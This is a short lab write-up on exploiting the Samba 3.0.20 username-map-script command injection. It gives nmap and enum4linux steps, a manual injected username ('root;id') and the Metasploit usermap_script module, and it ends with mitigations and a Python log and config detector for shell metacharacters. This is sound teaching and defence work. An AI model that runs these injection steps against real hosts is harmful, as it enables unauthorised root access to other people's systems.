01
Vulnerability Overview
Samba smbd 3.0.20 contains a vulnerability in its username map script feature that allows unauthenticated remote code execution. An attacker can craft a malicious username containing shell commands that are executed with root privileges.
This is a classic RCE vulnerability in Samba: the username map script passes the client-supplied username to a shell without sanitizing it, so shell metacharacters in the username are interpreted as commands (command injection).
02
Service Detection
```bash
nmap -sV -v -p 139,445 <target-ip>
```
03
SMB Enumeration
Use enum4linux to enumerate SMB shares and users:
```bash
enum4linux -a <target-ip>
```
04
Exploitation
The vulnerability allows command execution via crafted username. Manual exploitation:
```bash
smbclient -L //<target-ip> -U 'root;id'
```
05
Automated Exploitation — Metasploit
```bash
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS <target-ip>
run
```
06
Results & Impact
Outcome
- Successfully exploited username map script vulnerability
- Obtained root shell via command injection
- Full system access achieved
- Enumerated SMB shares and users
Detection & Mitigation (Blue Team)
- Update Samba to a patched version
- Disable the username map script feature
- Restrict SMB access to trusted networks
- Use a firewall to block ports 139/445 externally
- Monitor SMB logs for suspicious activity
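As an added defender-side example (not part of the original writeup), the script below implements two of the checks above: it reports whether an smb.conf still has an active `username map script` setting, and it flags usernames in smbd authentication log lines that contain shell metacharacters. The config fragments, script path and log lines are constructed samples, and the log format is only in the style of Samba's messages.

```python
import re

# Constructed sample inputs (not taken from any real host or incident).
SMB_CONF_VULNERABLE = """[global]
   workgroup = WORKGROUP
   Username Map Script = /etc/samba/scripts/mapusers.sh
"""
SMB_CONF_HARDENED = """[global]
   workgroup = WORKGROUP
   ; username map script = /etc/samba/scripts/mapusers.sh
"""
# Constructed lines in the style of smbd authentication log messages.
SAMBA_LOG = """\
check_ntlm_password:  Authentication for user [alice] -> [alice] succeeded
check_ntlm_password:  Authentication for user [root;id] -> [root;id] FAILED with error NT_STATUS_NO_SUCH_USER
check_ntlm_password:  Authentication for user [bob.smith] -> [bob.smith] succeeded
check_ntlm_password:  Authentication for user [$(whoami)] -> [$(whoami)] FAILED with error NT_STATUS_NO_SUCH_USER
"""

# Characters a shell would interpret; none of them belongs in a legitimate username.
SHELL_META = re.compile(r"[;|&`$(){}<>\\]")
USER_FIELD = re.compile(r"user \[([^\]]*)\]")

def username_map_script_enabled(conf_text):
    """Return the script path if 'username map script' is active in smb.conf, else None.
    Parameter names are case-insensitive and ignore whitespace; ';' and '#' start
    comments, '[' starts a section header."""
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#[":
            continue
        key, sep, value = line.partition("=")
        if sep and key.strip().lower().replace(" ", "") == "usernamemapscript" and value.strip():
            return value.strip()
    return None

def suspicious_usernames(log_text):
    """Return usernames from authentication log lines that contain shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        match = USER_FIELD.search(line)
        if match and SHELL_META.search(match.group(1)):
            hits.append(match.group(1))
    return hits

if __name__ == "__main__":
    print("username map script:", username_map_script_enabled(SMB_CONF_VULNERABLE))
    print("suspicious usernames:", suspicious_usernames(SAMBA_LOG))
```

Point the first function at the real smb.conf and the second at log.smbd (or the syslog destination configured for smbd); any hit from the second check is worth an alert regardless of whether the login succeeded, since the injection happens before authentication completes.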